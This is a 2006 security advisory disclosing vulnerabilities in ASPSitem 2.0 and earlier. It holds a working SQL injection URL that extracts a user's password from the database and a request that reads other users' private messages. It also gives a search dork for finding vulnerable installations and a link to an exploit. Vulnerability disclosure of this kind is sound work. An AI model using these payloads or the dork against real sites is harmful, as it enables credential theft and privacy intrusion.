<<< Date Index >>>     <<< Thread Index >>>

Advisory: ASPSitem <= 2.0 Multiple Vulnerabilities.

--Security Report--
Advisory: ASPSitem <= 2.0 Multiple Vulnerabilities.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 27/05/06 08:26 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@xxxxxxxxxx
Web: http://www.nukedx.com
}
---
Vendor: ASPSitem (http://www.aspsitem.com)
Version: 2.0 and prior versions must be affected.
About: Via this method remote attacker can inject arbitrary SQL queries to bid parameter in Anket.asp. Remote attacker also can read others private messages.The parameter id in Hesabim.asp did not sanitized properly 
for checking the owner status of private message.
Level: Critical
---
How&Example:
SQL injection ->
GET -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=[SQL]
EXAMPLE -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=4%20union%20select%20sifre,0%20from%20uyeler%20where%20 
id%20like%201
with this example remote attacker can leak userid 1's login information from database. 
Read others private messages ->
GET/EXAMPLE -> http://[victim]/[ASPSitemDir]/Hesabim.asp?mesaj=oku&id=1&uye=yourusername 
---
Timeline:
* 27/05/2006: Vulnerability found.
* 27/05/2006: Contacted with vendor and waiting reply.
* 27/05/2006: Vendor already released patch for SQL injection you can find it here: http://www.aspsitem.com/Forum.asp?forum=oku&msgid=44710 
--
Exploit: http://www.nukedx.com/?getxpl=39
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=39
---
Dorks: "Teşekkür ASPSitem"